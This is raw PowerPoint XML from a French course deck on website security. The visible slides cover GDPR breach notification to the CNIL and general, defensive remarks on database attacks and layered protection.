              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La démarche de conformité RGPD ne doit pas être perçue que comme une contrainte technique ou juridique. C’est avant tout l’occasion de faire le point sur l’utilisation des services numériques dans la collectivité et de s’assurer que la protection des données personnelles a bien été prise en compte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65C33107-FD5A-477E-8EE0-91D6BEB2A9D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4830528" y="3998387"/>
            <a:ext cx="6168398" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Des données personnelles ont été, de manière accidentelle ou illicite, détruites, perdues, altérées, divulguées ? Cet incident constitue une « violation de données ».</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Si cette violation est susceptible de représenter un risque pour les droits et libertés des personnes concernées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, vous devez la signaler à la CNIL dans les 72 heures. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"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466612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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2715683" y="2889092"/>
            <a:ext cx="6760633" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les types d’attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42611912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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="495300"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Attaque de la bd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B29B8106-6C06-4AD8-A911-4B559F776BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2216679" y="3657001"/>
            <a:ext cx="7593176" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="49000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Sans" panose="020B0503050000020004" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bien qu'il semble évident qu'un pirate doive posséder quelques connaissances de l'architecture de la base de données afin de conduire avec succès une attaque, il est souvent très simple de les obtenir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Fira Sans" panose="020B0503050000020004" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Sans" panose="020B0503050000020004" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i la base de données fait partie d'un paquet open source ou disponible publiquement, ces informations sont complètement ouvertes et disponibles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Sans" panose="020B0503050000020004" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>D'autres méthodes consistent à deviner l'utilisateur de table commune ainsi que des noms des colonnes.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="ZoneTexte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5FE93FD-927A-47B6-ABD5-EF60260D0542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2047349" y="1528550"/>
            <a:ext cx="3116262" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="23000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Des données critiques peuvent être stockées dans les bases de données : il est donc important de les protéger efficacement.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA1F6161-066F-4523-8D1F-ECF5DCDFD975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5485338" y="1555913"/>
            <a:ext cx="4476914" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="90000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La défense d’une BD se fait par couches. Plus vous ajouterez de tests pour protéger votre base, plus faible sera la probabilité de réussite d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attaqu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"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16690458"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Secteur">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19916</TotalTime>
  <Words>4405</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>371</Paragraphs>
  <Slides>51</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Polices utilisées</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>11</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Thème</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Titres des diapositives</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>51</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="63" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>courier new</vt:lpstr>
      <vt:lpstr>Fira Sans</vt:lpstr>
      <vt:lpstr>roboto</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Secteur</vt:lpstr>
      <vt:lpstr>Sécurité des sites web</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Risques de compromission</vt:lpstr>
      <vt:lpstr>L’ANSSI</vt:lpstr>
      <vt:lpstr>L’ANSSI</vt:lpstr>
      <vt:lpstr>LA CNIL</vt:lpstr>
      <vt:lpstr>Le RGPD</vt:lpstr>
      <vt:lpstr>Les types d’attaques</vt:lpstr>
      <vt:lpstr>Attaque de la bd</vt:lpstr>
      <vt:lpstr>Attaque de la bd</vt:lpstr>
      <vt:lpstr>Attaque de la bd</vt:lpstr>
      <vt:lpstr>Attaque de la bd</vt:lpstr>
      <vt:lpstr>Attaque de la bd</vt:lpstr>
      <vt:lpstr>Les formulaires</vt:lpstr>
      <vt:lpstr>Les formulaires</vt:lpstr>
      <vt:lpstr>Les formulaires</vt:lpstr>
      <vt:lpstr>Les formulaires</vt:lpstr>
      <vt:lpstr>Les formulaires</vt:lpstr>
      <vt:lpstr>Les attaques XSS</vt:lpstr>
      <vt:lpstr>Les attaques XSS</vt:lpstr>
      <vt:lpstr>Les attaques XSS</vt:lpstr>
      <vt:lpstr>Les inJECTions de fichiers</vt:lpstr>
      <vt:lpstr>Les configurations</vt:lpstr>
      <vt:lpstr>La gestion des sessions</vt:lpstr>
      <vt:lpstr>Les attaques CSRF</vt:lpstr>
      <vt:lpstr>Les attaques CSRF</vt:lpstr>
      <vt:lpstr>Les attaques man-in-the-middle</vt:lpstr>
      <vt:lpstr>Les attaques man-in-the-middle</vt:lpstr>
      <vt:lpstr>Les attaques man-in-the-middle</vt:lpstr>
      <vt:lpstr>La faille upload</vt:lpstr>
      <vt:lpstr>La faille include</vt:lpstr>
      <vt:lpstr>Les keyloggers</vt:lpstr>
      <vt:lpstr>Les Contre-mesures</vt:lpstr>
      <vt:lpstr>SOP policy</vt:lpstr>
      <vt:lpstr>Requêtes Xhr (js)</vt:lpstr>
      <vt:lpstr>Requêtes Fetch (JS)</vt:lpstr>
      <vt:lpstr>Requêtes cors</vt:lpstr>
      <vt:lpstr>Requêtes cors</vt:lpstr>
      <vt:lpstr>Requêtes cors</vt:lpstr>
      <vt:lpstr>HTML et JS</vt:lpstr>
      <vt:lpstr>HTML et JS</vt:lpstr>
      <vt:lpstr>Cloisonnement JS</vt:lpstr>
      <vt:lpstr>Cloisonnement JS</vt:lpstr>
      <vt:lpstr>La journalisation</vt:lpstr>
      <vt:lpstr>Utilisation de la TLS</vt:lpstr>
      <vt:lpstr>Protocoles SSL/TLS</vt:lpstr>
      <vt:lpstr>Authentification</vt:lpstr>
      <vt:lpstr>Contexte d’authentification</vt:lpstr>
      <vt:lpstr>Politique de sécurité MDP</vt:lpstr>
      <vt:lpstr>Bonnes pratiques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Sécurité</dc:title>
  <dc:creator>l.bellon</dc:creator>
  <cp:lastModifiedBy>nuances38 nuances-fx</cp:lastModifiedBy>
  <cp:revision>110</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-05T15:37:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-16T15:20:36Z</dcterms:modified>
</cp:coreProperties>
</file>